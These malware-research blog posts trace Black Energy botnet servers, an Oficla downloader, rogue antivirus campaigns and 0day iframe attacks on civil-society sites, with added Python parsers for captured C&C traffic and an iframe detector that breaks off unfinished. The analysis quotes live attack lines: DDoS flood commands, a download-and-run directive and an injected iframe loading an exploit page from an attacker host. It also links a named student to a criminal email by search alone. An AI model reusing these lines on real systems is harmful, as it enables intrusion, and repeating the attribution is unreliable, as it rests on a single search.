  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.

Background

In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attacks to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact this appears to be the case for a variety of botnets. Dancho Danchev states that groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraging “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate each other’s malware or use what FireEye calls a “BotnetWeb,” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types.

The infected computer connected to four control servers:

sexigood.ru (daro-x@yandex.ru)
81.176.232.103 – NEOWEB HOSTING, RU

091809.ru (bazhenov@mail.ru)
210.51.166.238 – China Netcom, CN

zflaersroot.cn (tem.ponakuru@mail.ru)
210.51.166.233 – China Netcom, CN

moneybizness.ru (belov@pisem.net)
210.51.10.184 – China Netcom, CN

The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103), from which a file “R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0
Host: sexigood.ru

An automated analysis of “R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer shows a check-in to 091809.ru (210.51.166.238):

POST /1/stat.php HTTP/1.0
Host: 091809.ru
id=x----------_382C0098&build_id=.8

HTTP/1.1 200 OK
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=

The response from the C&C is base64 encoded, when decoded it is:

10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x----------_382C0098

Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.

Further investigation revealed that the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom), was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.

During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:

flood http 81.176.239.67

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is, vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.

Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.

flood http www.vernem-prava.ru index.html

We also observed both command and control servers issue additional DDoS commands:

flood http besticq.ru
flood http www.newkaliningrad.ru forum
flood http wepn.ru
flood http 212.112.224.168

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)
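The check-in and the flood commands above can be worked through in a few lines. The following Python is an added example, not code from the original post or from any vendor’s Black Energy analysis. It decodes the base64 response, splits it on “#”, and pulls out the command the bot was given. Only the overall shape (a block of semicolon-separated integers, then the command line, then an interval, then the bot id) is inferred from the single response quoted above; the meaning of the individual integer options is not documented on this page and they are left unlabelled, and reading the third field as a re-check-in interval is an assumption. The bot id is written with plain hyphens, which is what the base64 actually decodes to. The second response is constructed here by encoding one of the flood commands listed above, so the parser is exercised on an attack order as well as on “wait”.

```python
"""Decode and parse a Black Energy 1.x HTTP check-in exchange.

Added example; not code from the original post or any vendor analysis.
Assumed: the decoded response has the form
    <semicolon-separated integer options>#<command line>#<interval>#<bot id>
This shape is inferred from the single response quoted in the post; the
meaning of the individual integer options is not given on the page.
"""
import base64
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed from the exchange quoted in the post. The bot id uses plain
# hyphens, which is what the base64 below actually decodes to.
CHECKIN_BODY = "id=x----------_382C0098&build_id=.8"
CHECKIN_RESPONSE = (
    "MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsy"
    "MDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg="
)

# Constructed: the same option block carrying one of the flood commands the
# post lists, so the parser is exercised on an attack order too.
FLOOD_RESPONSE = base64.b64encode(
    b"10;2000;10;1;2;30;100;3;20;1000;2000"
    b"#flood http www.vernem-prava.ru index.html#10#x----------_382C0098"
).decode("ascii")


@dataclass
class BeTasking:
    options: list      # raw integer options, unlabelled (not documented on the page)
    command: str       # e.g. "wait" or "flood"
    args: list         # remaining words of the command line
    interval: int      # assumed to be the re-check-in interval
    bot_id: str


def parse_checkin_request(body: str) -> dict:
    """Return the form fields the bot POSTs to stat.php (id, build_id)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def decode_response(b64: str) -> str:
    """The C&C answer is plain base64 with no further encoding."""
    return base64.b64decode(b64, validate=True).decode("ascii")


def parse_response(b64: str) -> BeTasking:
    """Split the decoded answer into options, command line, interval and bot id."""
    text = decode_response(b64)
    parts = text.split("#")
    if len(parts) != 4:
        raise ValueError(f"expected 4 '#'-separated fields, got {len(parts)}: {text!r}")
    options, cmdline, interval, bot_id = parts
    words = cmdline.split()
    if not words:
        raise ValueError("empty command")
    return BeTasking(
        options=[int(x) for x in options.split(";")],
        command=words[0],
        args=words[1:],
        interval=int(interval),
        bot_id=bot_id,
    )


def describe(request_body: str, response_b64: str) -> str:
    """One-line triage summary: is this bot idle or tasked, and against whom?"""
    req = parse_checkin_request(request_body)
    task = parse_response(response_b64)
    who = f"bot {req.get('id')} (build {req.get('build_id')})"
    if task.bot_id != req.get("id"):
        # The server echoes the id back; a mismatch means a mixed-up capture.
        who += f" [response addressed to {task.bot_id}!]"
    if task.command == "flood" and len(task.args) >= 2:
        # Observed form in the post: flood <proto> <host-or-ip> [path]
        proto, target = task.args[0], task.args[1]
        path = task.args[2] if len(task.args) > 2 else ""
        return f"{who}: {proto} flood against {target}/{path}"
    return f"{who}: {task.command}, next check-in in {task.interval}"


if __name__ == "__main__":
    print(describe(CHECKIN_BODY, CHECKIN_RESPONSE))
    print(describe(CHECKIN_BODY, FLOOD_RESPONSE))
```

Run against a real capture, the interesting check is simply whether the command field ever changes from “wait” to “flood”: that is the moment the bot is tasked, and the target host is in clear text once the base64 is stripped.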

Oficla/Sasfis

After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from moneybizness.ru (210.51.10.184):

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]

An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).10 Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]kill:0|delay:30|upd:0|backurls:[/info]

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla downloader instructs the infected computer to download “bot.exe,” which connects to the Black Energy control server.
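The two exchanges above, as an added example that is not part of the original post: a small Python parser for the [info]…[/info] tasking envelope, the key:value fields inside it, and the query string the bot sends. The field names (runurl, taskid, delay, upd, backurls, kill) are exactly those quoted above. The reading that the follow-up request’s tid echoes the task id just completed, and that kill:0 means the bot is not being told to uninstall, is an assumption drawn from the two samples; the unit of delay is not given on the page.

```python
"""Parse Oficla/Sasfis tasking exchanges as captured in the post.

Added example; not code from the original post. Field names come from the
two responses quoted there. Assumed: 'tid' in the follow-up request echoes
the task id just completed, and kill:0 means the bot is not told to
uninstall. The unit of 'delay' is not stated on the page.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed from the two request/response pairs quoted in the post.
FIRST_REQUEST = "/tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1"
FIRST_RESPONSE = ("[info]runurl:http://moneybizness.ru/bot.exe|taskid:43"
                  "|delay:30|upd:0|backurls:[/info]")
SECOND_REQUEST = "/tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1"
SECOND_RESPONSE = "[info]kill:0|delay:30|upd:0|backurls:[/info]"


def parse_request(path: str) -> dict:
    """Query parameters of the bot's GET: id, v, tm, b, plus tid/r on reports."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def parse_response(body: str) -> dict:
    """Unwrap [info]...[/info] and split 'key:value' fields on '|'.

    Each field is split on its FIRST ':' only, so the URL in runurl
    (which itself contains ':') survives intact. A bare 'key:' yields ''.
    """
    start, end = body.find("[info]"), body.rfind("[/info]")
    if start < 0 or end < start:
        raise ValueError("missing [info] envelope")
    fields = {}
    for item in body[start + len("[info]"):end].split("|"):
        if item:
            key, _, value = item.partition(":")
            fields[key] = value
    return fields


def classify(fields: dict) -> str:
    """What did the controller ask the bot to do?"""
    if "runurl" in fields:
        return f"download-and-run task {fields.get('taskid', '?')}: {fields['runurl']}"
    if fields.get("kill", "0") != "0":
        return "kill (uninstall) command"
    return f"idle; delay={fields.get('delay', '?')}"


def correlate(request_path: str, response_body: str) -> dict:
    """Join one request with its response into a triage record."""
    req = parse_request(request_path)
    resp = parse_response(response_body)
    return {
        "bot_id": req.get("id"),
        "version": req.get("v"),
        "build": req.get("b"),
        "reported_task": req.get("tid"),
        "action": classify(resp),
        "fields": resp,
    }


def timeline(pairs):
    """Summarise a sequence of (request, response) pairs as one line each."""
    lines = []
    for path, body in pairs:
        rec = correlate(path, body)
        done = f" (reports task {rec['reported_task']} done)" if rec["reported_task"] else ""
        lines.append(f"bot {rec['bot_id']} build {rec['build']}{done} -> {rec['action']}")
    return lines


if __name__ == "__main__":
    for line in timeline([(FIRST_REQUEST, FIRST_RESPONSE), (SECOND_REQUEST, SECOND_RESPONSE)]):
        print(line)
```

The runurl value is the pivot a responder wants: it is the next-stage payload (here the Black Energy “bot.exe”), and the b=DDOS1 tag in the query string is what lets the downloader’s operator tell which campaign or customer an infection belongs to.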

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103), connected to 091809.ru (210.51.166.238), the Black Energy control server, to zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, and to a URL associated with rogue/fake antivirus software.12

hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&a=2724
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&a=2724
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&id=2724

In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103), including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “Windows_Protector.exe” showed that it downloaded another file named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).16

This URL was also found in “x.exe” (hxxp://scanyourpc-fastx.com/pdm/x.exe) as well as in “Windows_Protector.exe.” The “x.exe”17 file from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.

The files that were on sexigood.ru (81.176.232.103) were later replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).

“rundll32”

There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections were redirected to “www.fbi.gov.”27 Software that connects to the IP address “66.197.149.41” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0
Referer: http://www.pay-per-install.info/
Host: www.pay-per-install.info

HTTP/1.1 301 Moved Permanently
Server: nginx
Location: http://www.fbi.gov/

The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”

$ host www.pay-per-install.info
www.pay-per-install.info is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”

There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertises the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.23

While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:

$ host www.rundll32.ru
www.rundll32.ru is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.

The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains, all of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com, rentaplayer.com, snowdomain.com, solutionmgmt.com, syattenterprises.com, trailingfirecards.com, noc8.com and strategymanagementinc.com.

In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.24

We also found that some pages redirected users to “counterweb.cn” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN) as the Black Energy command and control servers 091809.ru and sexiland.ru. The connections to counterweb.cn:

GET /t/out.php HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?default

GET /sutra/in.cgi?default HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?2

GET /sutra/in.cgi?2 HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://google.com

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)
hxxp://javascrlpt.com/s/in.cgi?8
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)

The domain, 000007.ru has been hosting “Windows_Protector.exe” which is the rogue AV we also found on sexigood.ru (81.176.232.103).25 The domain, javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.26 All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com.

Storm

There was another connection of interest in our packet capture sample, to “78.159.121.122” (NETDIRECT-NET, DE), which is very similar to the connection between a Storm “supernode” and a “subcontroller” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 78.159.121.122
Content-Length: 712
Pragma: no-cache

a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[...]&b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[...]

HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html

#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ

According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.

Notes

1 http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241

2 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

3 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

4 http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html

5 http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1

6 http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818 and http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

7 http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

8 http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/

9 http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt

10 http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b and http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615

11 http://www.malwareurl.com/search.php?domain=&s=Oficla&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on and http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2

12 http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com

13 http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683 and http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

14 http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829 and http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

15 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491 and http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

16 The IP address changed.

17 http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976 and http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115

18 http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684

19 http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745

20 http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930 and http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102

21 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137

22 http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html and http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html

23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 , http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&cd=10&hl=en&ct=clnk&gl=ca

24 http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552

25 http://www.malwaredomainlist.com/mdl.php?search=000007.ru

26 http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com

27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.

28 http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ and http://news.cnet.com/8301-10789_3-10040669-57.html and https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

29 https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Rogue AV: IAV Pro



Internet AntiVirus Pro is rogue anti-virus software that uses fake scans and threats to entice users into downloading and purchasing the software. Moreover, IAV uses intermediary sites that force users to download the software. There is no easy way to uninstall it, and IAV demands that people pay to receive software that can uninstall the software they never wanted in the first place. (For more about these guys read Dancho Danchev’s blog).

The “Support” form on IAV web sites stores submissions from users in a web accessible directory.

The 1200+ submissions found on one server mostly focused on the inability to remove the software and the fact that users either installed it by mistake or had no idea how it was installed.

Some are polite…

Subject: Removal
Content: Please remove this file from my system. I had run this by mistake. I already have my own antivirus. Thanks!
Country:CA

Some are not so polite…

Subject: fuck this shit
Content: get this shit off my computer, now!!!!
Country:US

Overall, people are extremely frustrated and unsure of what to do. Some seem to believe that this is a real anti virus product — some even ask if they are related to other real anti virus products. Many also indicate that they already have AV products installed.

Others recognise that it is a scam but are unable to do anything about it. Many state that it was their children that installed the software thinking they were doing their parents a favour. They also describe how it is interfering with their businesses, education and general computer usage.

What outrages people the most seems to be the fact that the rogue AV demands that you buy the software if you want to be able to uninstall it.

It is a good reminder that this stuff affects real peoples lives in a very unpleasant way.

“0day”: Civil Society and Cyber Security



by Nart Villeneuve & Greg Walton

Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks.

However, civil society organizations are being compromised by attackers using “0day” exploits – vulnerabilities for which there is no patch or “fix” available from the software vendor. Therefore, even if all the software a civil society organization uses is completely up to date, it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.

It is difficult to determine who is behind the attacks, and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack is just a convenient way to get people’s attention and compromise computer systems. Moreover, it remains unclear whether the attackers were able to acquire 0day exploits before they became public, or whether they simply leveraged them quickly after they became publicly available and before there was a vendor supplied security patch.

Therefore, in this post we explore cases in which there is some form of relationship between 0day exploits and their use against civil society organizations, in an effort to understand the effect of these attacks given the difficult nature of attribution.

In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.1 The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.

Summary

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Background

There is a wealth of research on 0day malware attacks emanating from locations such as Russia and China. These reports document the attackers’ ability to leverage 0day exploits in their attacks:

One of the most striking features of these attacks is how quickly they adapt new exploits to their
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.2

However, these reports do not focus on explicitly political attacks; they cover a variety of threats including fraud, the theft of gaming credentials and, in general, the theft of information. The exploration of politically motivated malware attacks using 0day exploits is, however, nothing new.

Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.3 Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.4 These attacks targeted NGOs, the Tibetan community and the Falun Gong movement. Van Horenbeeck’s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.5

Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the “GhostNet” investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with malware that connected back to a control server at 221.10.254.248 using the host name 927.bigwww.com.6 On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.7

In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had been compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.8 At Drewla we also found a computer connecting to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck,9 as well as connections to religion.xicp.net, which was reportedly serving a 0day in February 2009.10

Investigation

On 2009-07-06 ISC SANS posted a list of domains that were hosting 0day Internet Explorer exploits, and 64tianwang.com was on the list.11 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus more widely on human rights and had to move its website overseas after it was shut down by Chinese authorities.12 The organization’s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.13 14 64tianwang.com has previously been a target for Internet-based attacks.15

An examination of the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe inserted into the legitimate content on the page. In fact, we have seen “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).16 Anyone visiting 64tianwang.com was loading a malicious page from rfsb.xicp.net:

document.write(“<iFraMe width=’0′ height=’0′ src=’hxxp://rfsb.xicp.net/css/a.htm’ frameborder=’0′>“);

The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.17 Anyone visiting 64tianwang.com using Internet Explorer was likely compromised.
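The injected tag above has three properties a defender can key on: it is emitted at runtime through document.write() rather than sitting in the static markup, it is zero-sized, and it points at a host that is not the site being visited (the mixed-case “iFraMe” spelling is a further hint that someone wanted to dodge a naive grep). The following script is an added example, not code from the original post or from the authors; it scans a page for iframes with those properties. The sample page is constructed for the example, with only the rfsb.xicp.net URL taken from the post; everything else in the markup is invented.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: legitimate markup plus an injected document.write()
# iframe of the shape found on 64tianwang.com. Only the rfsb.xicp.net URL comes
# from the post; the surrounding markup is made up for this example.
SAMPLE_PAGE = """<html><head><title>64tianwang</title></head>
<body>
<h1>Missing persons</h1>
<script type="text/javascript">
document.write("<iFraMe width='0' height='0' src='http://rfsb.xicp.net/css/a.htm' frameborder='0'></iFraMe>");
</script>
<iframe src="/news/latest.htm" width="600" height="400"></iframe>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.I | re.S)
DOC_WRITE_RE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.I | re.S)
IFRAME_RE = re.compile(r"<\s*(iframe)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>'"]+))""")


def parse_attrs(attr_text):
    """Return a lowercase-keyed dict of tag attributes from raw attribute text."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_tiny(value):
    """True for width/height values of 0 or 1 (bare number or with a unit)."""
    if value is None:
        return False
    digits = re.sub(r"\D", "", value)
    return digits != "" and int(digits) <= 1


def same_site(host, site_host):
    """Treat the bare site, its www. form and its subdomains as first-party."""
    site = site_host.lower()
    if site.startswith("www."):
        site = site[4:]
    host = host.lower()
    return host == site or host == "www." + site or host.endswith("." + site)


def find_suspicious_iframes(html, site_host):
    """Flag iframes that look injected: script-written, zero-sized, third-party,
    or spelled with mixed case to evade simple signature matching."""
    candidates = []
    # iframes that only exist at runtime, emitted through document.write()
    for m in DOC_WRITE_RE.finditer(html):
        for im in IFRAME_RE.finditer(m.group(2)):
            candidates.append(("document.write", im.group(1), im.group(2)))
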